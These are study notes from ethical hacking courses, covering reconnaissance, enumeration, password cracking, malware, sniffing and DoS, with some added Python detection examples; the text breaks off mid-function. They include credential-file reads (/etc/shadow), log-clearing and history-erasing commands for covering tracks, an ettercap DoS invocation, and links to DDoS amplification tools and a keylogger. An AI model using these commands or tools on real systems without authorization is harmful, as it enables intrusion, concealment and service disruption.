Ethical Hacking : Notes
Disclaimer:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaims any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserves the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
Reference : https://www.linkedin.com/learning/
Technology: Security
Become an Ethical Hacker
Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.
Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock
** Attack types
1. Passive
- Sniffing
- Port scanning
2. Active
- Release malware
- Launch DDoS
** Standards:
- PCI DSS
- HIPAA
- SOX
- GDPR
- COBIT framework
** Burst Attack or DoS
Reconnaissance - gather information about you.
3 basics for an org to contain a cyber attack
1. Technical controls - Detect & Protect
2. Administrative
3. People
VLANS
NAT - N/w address translation
Spam filters, packet shapers & honeypots
TOGAF - The Open Group Architecture Framework
ITIL - Information Technology Infrastructure Library
COBIT - Control Objectives for Information and Related Technology
SOX - Sarbanes-Oxley (SOX) act
SOX - section 301 & 404 = Indirectly deal with Information assurance and Data integrity
Penetration testing : can include N/w devices, email, hosts, wireless, applications, and websites.
FISMA - Federal Information Security Management Act
Vulnerability Scanning Tool
1. Tenable
Ethical Hacking
Means -
- what is derived from the information
- what can be planned to devise counter measures
Planned Five Phases approach
- Reconnaissance
- Scanning
- Gaining access
- Maintaining access
- Covering Tracks
******************************************************************************
Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock
Finding Information everywhere:-
Public resources - Websites, directories, email, job sites, Social websites.
Google Hacking database:
https://www.exploit-db.com/google-hacking-database
HTTrack Website Copier
https://www.httrack.com/
Montastic is free for open source software
https://www.montastic.com/
StatusOK
Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.
https://github.com/sanathp/statusok
https://www.shodan.io/
Shodan is the world's first search engine for Internet-connected devices.
Email Header look up
https://mxtoolbox.com/
Metagoofil is an information gathering tool designed for extracting metadata of public documents
https://www.kali.org/tools/metagoofil/
FOCA (Fingerprinting Organizations with Collected Archives)
https://github.com/ElevenPaths/FOCA
theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.
https://github.com/laramies/theHarvester
https://www.kali.org/tools/theharvester/
DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.
https://dmarc.org/
The Anti Hacker Alliance™ fights against Hackers
https://anti-hacker-alliance.com/
tracert google.com
pathping google.com
Network Tools: The Trusted Free Online
https://network-tools.com/
dig Command in Linux
https://www.geeksforgeeks.org/dig-command-in-linux-with-examples/
https://toolbox.googleapps.com/apps/main/
https://dnsdumpster.com/
https://who.is/
ip logger : can track geo location using ip logger URL
https://iplogger.org/
******************************************************************************
Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock
Ports 1 - 1023
21 FTP
22 SSH
53 Domain Name system
80 HTTP
88 Kerberos
Ports from 1024-49151 are registered
3389 - Remote desktop Protocol (RDP)
Vulnerability Scan
Firewall response in port scanning:
open means listening
Closed means denying
No reply means in stealth mode
Tools in Kali Linux:
Netcat and Nmap
DMitry
Curl
Armitage
Banner Grabbing: is done to get
operating system
Open ports and service running
To Prevent Banner Grabbing:
Mask or disable the web server
Hide file extensions on services
Disable unnecessary service
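The three firewall responses listed above (open, closed, no reply) and the banner-grabbing point can be checked against your own host with a small probe. This is an added example, not code from the course; it starts throwaway listeners on 127.0.0.1 (constructed targets) so it runs offline, and the banner string `SSH-2.0-ExampleServer_1.0` is invented for the demo.

```python
import socket
import threading

# Added example (not from the course notes): classify one TCP port the way
# the notes describe firewall responses, and read whatever banner the
# service volunteers so you can verify your own services do not leak one.
#   connection accepted      -> "open"     (something is listening)
#   connection refused (RST) -> "closed"   (host answers, nothing listening)
#   no reply before timeout  -> "filtered" (firewall in "stealth" mode)


def start_banner_server(banner: bytes) -> int:
    """Start a throwaway listener on 127.0.0.1 that sends `banner` to every
    client and closes. Returns the ephemeral port (constructed target)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                if banner:                  # a "hardened" server sends nothing
                    conn.sendall(banner)

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def free_closed_port() -> int:
    """Find a local port with nothing listening (bind, record, release)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe_port(host: str, port: int, timeout: float = 1.0) -> dict:
    """Classify a single TCP port and grab up to 256 bytes of banner."""
    result = {"port": port, "state": "filtered", "banner": ""}
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            result["state"] = "closed"      # RST came back: host up, port not listening
            return result
        except (socket.timeout, OSError):
            return result                   # silence: dropped by a firewall
        result["state"] = "open"
        try:
            data = s.recv(256)              # read what the service announces
        except (socket.timeout, OSError):
            data = b""
        result["banner"] = data.decode("ascii", "replace").strip()
    return result


if __name__ == "__main__":
    chatty = start_banner_server(b"SSH-2.0-ExampleServer_1.0\r\n")   # constructed banner
    quiet = start_banner_server(b"")
    for p in (chatty, quiet, free_closed_port()):
        print(probe_port("127.0.0.1", p))
```

The "quiet" listener is the state the prevention list aims for: the port still shows as open, but the probe learns nothing about the software behind it.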
SSDP: Simple Service Discovery Protocol
https://www.spiceworks.com/free-network-monitoring-management-software/
NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.
https://www.netresec.com/?page=NetworkMiner
FING App : https://www.fing.com/products/fing-app
Net Scan by Nick Circelli
IP Tools: WiFi Analyzer by AmazingByte
Nikto :
Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.
https://www.kali.org/tools/nikto/
Staying anonymous:
1. Use private browsing
2. privacy badger
3. use password manager
4. use duckduck go
5. use VPN
6. temp email
Stay anonymous in Mobile
1. Don't use phone
2. don't use google
3. disable gps
4. use waze
Onion Routing TOR
1. Don't torrent
2. don't install or enable plugins
3. use only https
4. don't open documents
TOR flow network
https://torflow.uncharted.software/
Proxy Chain: Tools
1. Proxy Switcher
2. Proxifier
3. Proxy workbench
Kali Linux:
sudo apt-get install tor
sudo apt-get install proxychains
SSH tunnels:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
https://www.putty.org/
***************************************************************************
Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore
Enumeration is Identifying -
1. Username
2. System addresses
3. Network resources
4. Shares
5. Other targets
Before vulnerability testing
- Extract usernames
- Gather host information via null sessions
- port enumeration
- user account enumeration
- special protocol enumeration
Approaches
- Local host enumeration
- remote host enumeration
- internet enumeration
- port and services enumeration
Useful service
Port 53 - DNS Domain Name System
Port 25 - SMTP Simple Mail transfer Protocol
Port 135 - RPC Remote Procedure calls
Port 139 - NetBIOS
Port 161 - SNMP simple network management Protocol
Port 389 - LDAP Lightweight Directory Access Protocol
Port 445 - SMB Server message Block
┌──(kali㉿kali)-[~]
└─$ echo $UID
┌──(kali㉿kali)-[~]
└─$ cat /etc/passwd |more
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/sudoers
┌──(kali㉿kali)-[~]
└─$ getent group sudo
How to run in root mode from User mode
┌──(kali㉿kali)-[~]
└─$ sudo su
┌──(root㉿kali)-[/home/kali]
└─# echo $UID
0
┌──(root㉿kali)-[/home/kali]
└─# exit
┌──(kali㉿kali)-[~]
└─$
NetBIOS
NetBIOS name service - port 137 UDP
Datagram Distribution service - PORT 138 UDP
NetBIOS over TCP/IP - PORT 139 TCP
SMB
Samba is a Linux implementation of SMB
DCE Distributed Computing Environment
RPC Remote Procedure Call
Local-Host Enumeration:
Profiling a Linux Metasploitable 2
$ cat /proc/version
$ cat /etc/*-release
$ cat /proc/cpuinfo
$ df -a
$ df -h
$ cat /etc/shells
List of user names
$ cat /etc/passwd
Password with Hash
$ sudo cat /etc/shadow
$ pinky
$ w
$ who -a
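The `cat /etc/passwd` step above is where a defender's local-host review usually starts. As an added example (not code from the course), here is a parser for the passwd format with the checks an auditor would actually run: which accounts can log in interactively, which have UID 0 besides root, and which UIDs are shared. The sample text is constructed; pass `open("/etc/passwd").read()` to `audit_passwd()` to run it on a real host.

```python
from collections import defaultdict

# Added example (not from the course): parse and audit /etc/passwd content.
# SAMPLE_PASSWD is constructed data for the demo, not a real file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
kali:x:1000:1000:Kali,,,:/home/kali:/usr/bin/zsh
svc-deploy:x:1001:1001::/srv/deploy:/bin/bash
toor:x:0:0::/root:/bin/sh
"""

# Shells that refuse interactive logins on common distributions.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/bin/sync"}


def parse_passwd(text: str) -> list:
    """Turn passwd lines into dicts; blank and '#' lines are skipped and a
    line with the wrong field count raises, rather than being misread."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> dict:
    """Summarise the things a reviewer looks for in the user database."""
    entries = parse_passwd(text)
    interactive = [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]
    extra_root = [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]
    by_uid = defaultdict(list)
    for e in entries:
        by_uid[e["uid"]].append(e["name"])
    duplicate_uids = {uid: names for uid, names in by_uid.items() if len(names) > 1}
    return {"total": len(entries), "interactive": interactive,
            "extra_root": extra_root, "duplicate_uids": duplicate_uids}


if __name__ == "__main__":
    for key, value in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{key}: {value}")
```

In the constructed sample the `toor` line is the finding: a second UID 0 account with a login shell, which is exactly what the `echo $UID` and `getent group sudo` checks earlier in the chapter would not reveal on their own.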
Profiling a windows Host
Download PsTools:- https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
Windows Terminal
Downloads> cd .\PSTools\
Downloads\PSTools> .\PsInfo.exe
Downloads\PSTools> .\PsInfo.exe -d
Downloads\PSTools> .\PsInfo.exe -s
Downloads\PSTools> .\pslist.exe
Downloads\PSTools> .\pslist.exe -t
Downloads\PSTools> .\pslist.exe -x
Downloads\PSTools> .\psloglist.exe -n 10
Downloads\PSTools> .\PsLoggedon.exe
Downloads\PSTools> .\PsService.exe
Downloads\PSTools> .\PsService.exe security Eventsystem
Downloads\PSTools> .\PsService.exe depend Eventsystem
Kali Linux :-
Getting details from metasploitable-2
smbmap -u '' -p '' -H 10.0.2.4 -R
sudo netstat -i
Get UDP open ports only
nmap -sU 10.0.2.4
Get TCP open ports only
nmap -PS 10.0.2.4
SMB from Linux:-
nbtscan
┌──(kali㉿kali)-[~]
└─$ nbtscan -h
┌──(kali㉿kali)-[~]
└─$ sudo nbtscan -v -s : 10.0.2.0/24
┌──(kali㉿kali)-[~]
└─$ sudo nbtscan -rv 10.0.2.0/24
nmap
┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-os-discovery 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-enum-users 10.0.2.4
enum4linux
┌──(kali㉿kali)-[~]
└─$ enum4linux -U 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.0.2.4
rpcclient
┌──(kali㉿kali)-[~]
└─$ rpcclient -h
https://www.mitec.cz/netscan.html
https://www.softperfect.com/products/networkscanner/
https://www.ireasoning.com/mibbrowser.shtml
WMI
Understanding how to enumerate WMI is useful both for offensive and defensive activities.
whatweb
┌──(kali㉿kali)-[~]
└─$ whatweb 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ whatweb 10.0.2.0/24 --no-errors | grep -v Unassigned
nikto
┌──(kali㉿kali)-[~]
└─$ nikto -h 10.0.2.4
zaproxy
sudo apt install zaproxy
https://www.kali.org/tools/zaproxy/
gobuster
https://www.kali.org/tools/gobuster/
Tracing Routes
┌──(kali㉿kali)-[~]
└─$ sudo traceroute -I 67.3.11.1
Enumeration Cloud
AWS has its own CLI (command line interface)
NetScanTools Basic Edition
https://www.netscantools.com/nstbasicmain.html
LDAP
https://sourceforge.net/projects/ldapadmin/
Telnet
┌──(kali㉿kali)-[~]
└─$ telnet 10.0.2.4
Chapter 5: Ethical Hacking: Vulnerability Analysis By: Lisa Bock
Managing Org Risk:
Risk = Threats * Vulnerabilities
Zero-Day Attack
Vulnerabilities found in wild -> Unaware = Public + Vendor
Then after the period Vendor is aware -> Unaware = Public
Vendor released patches -> aware = Public
Assessing Vulnerabilities
Network scanning
2 types
Information systems = DBMS, software
Information technologies = Hardware, n/w devices
How run Vul. scan
Unauthenticated scan = No user/pass, basic config, can miss many vuln.
Authenticated scan = clone environment system, valid user/pass, detailed scan
Lifecycle for Vuln management
Baseline
Assess Vuln = Plan (compliance req.; Tools - port scans, n/w scans, web app scans.)
Assess Risk
Remediate = Mitigate the vuln.
Verify = retest
Monitor = continuous monitoring
Threat Modeling
Used to create a model of the entire system along with potential points of attack and a list of possible attacks
Data Breach :
https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/#bysensitivity
Web-based User Feedback System
https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf
Using STRIDE, listed here are some of the threats possible against this system, organized by class of threat.
Analyzing Vulnerabilities
NIST SP 800-30, Page 78
https://www.nist.gov/privacy-framework/nist-sp-800-30
NIST: Common Vulnerability Scoring System Calculator [CVSS]
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
CVE: Common Vulnerabilities and Exposures
Each CVE has id and score is derived from metrics CVSS
Current CVSS Score Distribution For All Vulnerabilities
https://www.cvedetails.com/
https://www.cvedetails.com/vulnerability-list.php?vendor_id=0&product_id=0&version_id=0&page=22&hasexp=0&opdos=0&opec=1&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2022&cweid=0&order=2&trc=2105&sha=3ecb9c2942e59ed03bfff2cd27fb2aa98519a183
Learn Vulnerability scan from Web
https://www.hacker101.com/start-here
https://ctf.hacker101.com/auth/login
https://www.hackerone.com/
Virtual Machine Image :
https://www.osboxes.org/
Kali linux
Commando VM:
https://www.mandiant.com/resources/commando-vm-windows-offensive-distribution
Github link:-
https://github.com/mandiant/commando-vm
Nikto : Built into Kali linux
┌──(kali㉿kali)-[~]
└─$ nslookup scanme.nmap.org
┌──(kali㉿kali)-[~]
└─$ nikto -h 45.33.32.156
Fuzz Testing
A black box method that floods a system with inputs
Kali linux - OWASP ZAP
LAN
Defending the LAN
Spoofing:
Man In The Middle Attack
ARP spoofing
MAC spoofing
Cisco Discovery Protocol Attack
VLAN hopping attack
DHCP attack
Yersinia attack Tool:
https://www.kali.org/tools/yersinia/
┌──(kali㉿kali)-[~]
└─$ sudo yersinia -G
Attacks can be launched from yersinia.
Monitoring Tools:
https://www.nagios.org/
https://www.tenable.com/products/nessus
https://www.gfi.com/
https://sectools.org/
Firewalls and HIDS
Endpoint firewall examples- ZoneAlarm, ESET, and Norton Personal Firewall
Intrusion detection:
Host intrusion detection must first learn the system; it can then monitor the host for suspicious activities
Examples- Symantec endpoint protection, McAfee host intrusion Prevention, Suricata.
https://help.eset.com/eis/15/en-US/
Hack a website Exercise:-
https://hbh.sh/home
Chapter 6: Ethical Hacking: System Hacking, By: Lisa Bock
APT Advanced persistent Threat
NTLM New Technology LAN Manager
Kerberos
PAM Pluggable Authentication Modules
SASL Simple Authentication and Security Layer
Gaining Access:-
SAM Security Account Manager
Random Password Manager:-
https://www.passwordrandom.com/
Dictionary Attack
Brute Force Attack
Hybrid Attack
Password cracking Tools:
L0phtCrack 7.2.0 has been released as an open source project
https://gitlab.com/l0phtcrack/l0phtcrack/-/releases
Ophcrack is a free Windows password cracker based on rainbow tables.
https://ophcrack.sourceforge.io/
John the Ripper
Cain and Abel
Secure Hash Algorithms used for hashing the passwords
Rainbow crack:-
http://project-rainbowcrack.com/
Create the Hash format for password
https://www.fileformat.info/tool/hash.htm
Online Reverse Hash Lookup
http://reverse-hash-lookup.online-domain-tools.com/
http://www.md5.cz/
Escalating Privileges
Horizontal
Vertical
Privilege escalation takes advantage of vulnerability and tries to gain administrator access.
Password Resetting Tool:
https://trinityhome.org/
https://www.password-changer.com/index.html
simda bot free ip scanner
https://checkip.kaspersky.com/
Recognizing Spyware
Categories of Malware
Spyware
Viruses
Worms
Trojans
Rootkits
Adware
Block Third party cookies always
Anti Spyware Tools:
Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.
https://www.safer-networking.org/products/spybot-identity-monitor/
https://www.safer-networking.org/free-download/
Keyloggers:
https://www.elitekeyloggers.com/
Help Your Kids by Watching Their Back
https://www.refog.com/
Objective-see:
non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference
https://objective-see.org/
malwarebytes
https://www.malwarebytes.com/keylogger
Hiding in Plain Sight
Creating Hidden content
desktop> notepad temp.txt:secret.txt
To display hidden content:-
desktop>more < temp.txt:secret.txt
Steganography Tools: these are obsolete
MP3Stego
S-Tools
OpenPuff
Update : Local Security Policy in windows
Local policies -> Audit Policy-> audit account logon events -> enable
Covering Tracks:
For Linux: Metasploit meterpreter > clearev
Open log files stored in /var/log directory
In BackTrack: kwrite /var/log/messages
Erase command history
export HISTSIZE=0
Open Event Logger and select clear log
Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore
Introduction to Malware
Improve the Windows startup services with Regedit, then delete unwanted Run entries under these registry keys:
- Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
- Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
- Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs
ROOTKIT
Zeus malware:
Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.
Citadel (malware)
Virus Construction Kit
2 types
GUI interface
Configuration file
SpyEye Builder
FireCrypt
Trojan Development Kit - TDK
Reference: Transcriptase–Light: A Polymorphic Virus Construction Kit
https://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1513&context=etd_projects
MITRE ATT&CK
is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
https://attack.mitre.org/
Malware Detection
IOC Indicator of Compromise
IOA Indicator of Attack
IOC Bucket
is a free community driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way.
OASIS OPEN:
https://www.oasis-open.org/
ADS Anomaly Detection System
Sandboxing Malware
Some enterprise products as examples
https://www.sonicwall.com/products/firewalls/
Malware That changes
Polymorphic
Metamorphic
Ransomware
WannaCry
Delivery via Phishing, via port 445 - configured for file sharing
APT Defenses: advanced persistent threat
Targeted cyberattacks logbook
Click on each malware entry to get more information
SODIN malware:
Exploits using CVE-2019-2725/9
Dropper installs w32.sodin malware
Privilege escalation using CVE-2018-8453 & gains full system privileges
BlackEnergy 2 & 3: Malware - attacks industrial control workstations
Encrypted Rootkill payload
GreyEnergy Malware
Reverse Engineering Malware
https://zeltser.com/mastering-4-stages-of-malware-analysis/
https://cuckoosandbox.org/
VirusShare.com is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code
https://virusshare.com/about
malware-traffic-analysis
A source for packet capture (pcap) files and malware samples
https://www.malware-traffic-analysis.net/
Automated Malware analysis
Hybrid Analysis
This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.
BlackEnergy /2 /3 - Malware - attacks industrial control workstations
Encrypted Rootkill payload
Help file in Russian
It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.
BlackEnergy 2
Kernel mode driver
Process injection
Privilege escalation based on ms08-025
BlackEnergy 3
2015 Ukraine power grid attacks
Then gave into GreyEnergy Malware
Analyzing Packers
UPX
UPX is a free, portable, extendable, high-performance executable packer for several executable formats.
Ghidra: tool developed by the NSA
A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission
Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock
Sniffing or Packet Analysis
Tools
Wireshark
Npcap
Npcap comes from the Nmap project and is installed on Windows along with Wireshark.
Phases
Gather
Decode
Display
Analyze
Is the traffic normal
TCP flags
Malware Signatures
Traffic in clear text
Router advertisements
OSI Model
Frame
OSI model in wireshark
Active Attacks:
Denial of Service DoS
Buffer overflow
Password attack
Tapping in to Data Stream
2 basic types of ethernet environments
Shared or hub based
Switched network
Wireless
802.11b/g/n act like a hub
IPv4 Vs IPv6
MAC Attacks
MACOF:
┌──(kali㉿kali)-[~]
└─$ sudo macof
Vulnerable protocols
STP = Spanning Tree Protocol
Attacks
DoS using BPDU Flood
CDP = Cisco Discovery Protocol
Attacks
Send bogus CDP to other devices
Flood CDP & cause a DoS
DTP
DHCP
HSRP
ISL
VTP
802.1Q
802.1X
Macof Attack Defense
Use switch port security
MAC Spoofing Defense
Used in man-in-the-middle attacks
Use filtering of trusted IP & MAC addresses
DHCP
DHCP process
Discover
Offer
Request
Acknowledge
VLAN Access Control List VACL
Access control on the switch not the router
ARP
Ettercap
Tool in Kali Linux
Used in man in the middle attack
┌──(kali㉿kali)-[~]
└─$ ettercap -G
Old websites
AsecuritySite:https://asecuritysite.com/ids
DNS
To prevent DNS attacks
Enable Cache locking
Sniffing Tools and Techniques
Tools
Linux Tools
Tcpdump
Ettercap
Dsniff
Chapter 9: Ethical Hacking: Social Engineering By: Lisa Bock
Social Engineering Techniques
Phone phishing
Online recon
Dumpster diving
Shoulder surfing
Simple persuasion
Catfishing
Poses as love interest
Lures you into a relationship
Browser
Privacy most important
TOR browser
Extensions or Addons
Auto update enabled
Reputation Risk
Use of social platform
Information Collection
Identification Theft
Report fake account in facebook
Penetration testing with social Engineering
Phishing emails
Dangerous websites
Fake Call
Pentesting with SET - Social Engineering Toolkit
Download the toolkit or use with kali linux
SET - Crafts the bait
Metasploit - creates the exploit
The Social-Engineer Toolkit (SET)
The Social-Engineer Toolkit (SET) - TrustedSec
https://www.trustedsec.com/
Spamhaus
https://www.spamhaus.org/statistics/spammers/
Desktop File Shredder
https://www.fileshredder.org/
Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore
Understanding DoS
Tools
Digital Attack Map
https://www.digitalattackmap.com/
Attack Types:
DoS
DDoS
Network Based attacks
TCP SYN flood
Smurf (ICMP) flood
UDP flood
ARP flood
DNS reflection
Wireless Attacks
De-authentication
Routing congestion
Application Attacks
HTTP services
FTP service
SIP services
Infrastructure of DoS
Hping3 -h
┌──(kali㉿kali)-[~]
└─$ hping3 -h
HPing3 Cheatsheet ≈ Packet Storm
https://packetstormsecurity.com/files/97414/HPing3-Cheatsheet.html
https://dl.packetstormsecurity.net/papers/general/hping3_cheatsheet_v1.0-ENG.pdf
Hyenae download | SourceForge.net
https://github.com/r-richter/hyenae
Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.
LOIC Approach
https://github.com/NewEraCracker/LOIC
https://sourceforge.net/projects/loic/
Ettercap
┌──(kali㉿kali)-[~]
└─$ ettercap -P list
ettercap -TQP dos_attack
ettercap -G
┌──(kali㉿kali)-[~]
└─$ service --status-all | more
ntpdos
Denial of service using NTP servers to amplify attacks
It appears someone is using an attack vector like this to DDOS CloudFlare
https://github.com/vpnguy-zz/ntpdos
GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers
Memcached
Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.
https://memcached.org/
Memcrashed-DDoS-Exploit
This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io
https://github.com/649/Memcrashed-DDoS-Exploit
GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
Wireless DoS
Airmon-ng
https://www.aircrack-ng.org/doku.php?id=airmon-ng
┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng
Application DoS
goldeneye
https://www.kali.org/tools/goldeneye/
GoldenEye is an HTTP DoS test tool. It can be used to test whether a site is susceptible to denial-of-service (DoS) attacks: it opens several parallel connections against a URL to check whether the web server can be overwhelmed.
OWASP Top Ten
https://owasp.org/www-project-top-ten/
Ransomware
Cryptolocker Ransomware
Distributed by botnets
Drops randomly generated name
Inserts startup command into registry
Post Encryption
Ransom Message displayed
Countdown timer started
If payment not received, files are deleted
Paying Ransom
Payment of the ransom is made using bitcoins.
Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards.
Once the victim pays the ransom, a transaction ID is provided.
The victim can then enter this into the Cryptolocker program that is running.
The private key is then sent to the victim, and the decryption process begins.
Mitigation Techniques
Mitigation by design
Priority based servicing
Priority Management
Discard low priority
Aggregate based congestion control [ACC]
Egress filtering
Packet inspection
Detect bad packets
Ingress filtering
Malicious packet detection
Network context
Operation Mitigation
IP address verification
Source address spoofing
Real Time detection
Real time traceback
Rate limiting
ACLs
Detecting known malicious threats
Characterizing normal
Metrics to reflect normal boundaries
Detecting traffic anomalies
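The "characterizing normal" and "detecting traffic anomalies" items above, together with the TCP flags check from the Sniffers chapter, come down to one question: what does the flag mix per source look like? As an added example (not code from the course), the block below decodes the flag bits from a raw TCP header and uses them to pick out a SYN-flood source from a constructed packet mix; the addresses 10.0.2.15 and 10.0.2.99 and all packets are made up in-memory, nothing is captured from a network.

```python
import struct
from collections import Counter

# Added example (not from the course): decode TCP flag bits and flag sources
# whose traffic is almost entirely bare SYNs (a SYN flood never completes the
# handshake, so it produces no ACKs). All packets here are constructed.

TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
             "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def build_tcp_header(sport: int, dport: int, flags: int,
                     seq: int = 0, ack: int = 0) -> bytes:
    """Construct a minimal 20-byte TCP header (no options) for the demo."""
    data_offset_and_flags = (5 << 12) | (flags & 0x1FF)   # 5 x 32-bit words
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                       data_offset_and_flags, 65535, 0, 0)


def decode_flags(header: bytes) -> list:
    """Return the names of the flag bits set in a TCP header."""
    if len(header) < 20:
        raise ValueError("truncated TCP header")
    _, _, _, _, off_flags = struct.unpack("!HHIIH", header[:14])
    return [name for name, bit in TCP_FLAGS.items() if off_flags & bit]


def syn_flood_suspects(packets, min_syns: int = 20, ratio: float = 0.9) -> dict:
    """packets: iterable of (src_ip, tcp_header_bytes).
    A legitimate client sends one SYN per connection and then many ACKs;
    a flooder sends SYNs and never finishes. Sources with at least
    `min_syns` bare SYNs whose share of the traffic is >= `ratio` are
    returned with that share. `min_syns` keeps single short probes quiet."""
    syns, acks = Counter(), Counter()
    for src, hdr in packets:
        flags = decode_flags(hdr)
        if "SYN" in flags and "ACK" not in flags:
            syns[src] += 1
        elif "ACK" in flags:
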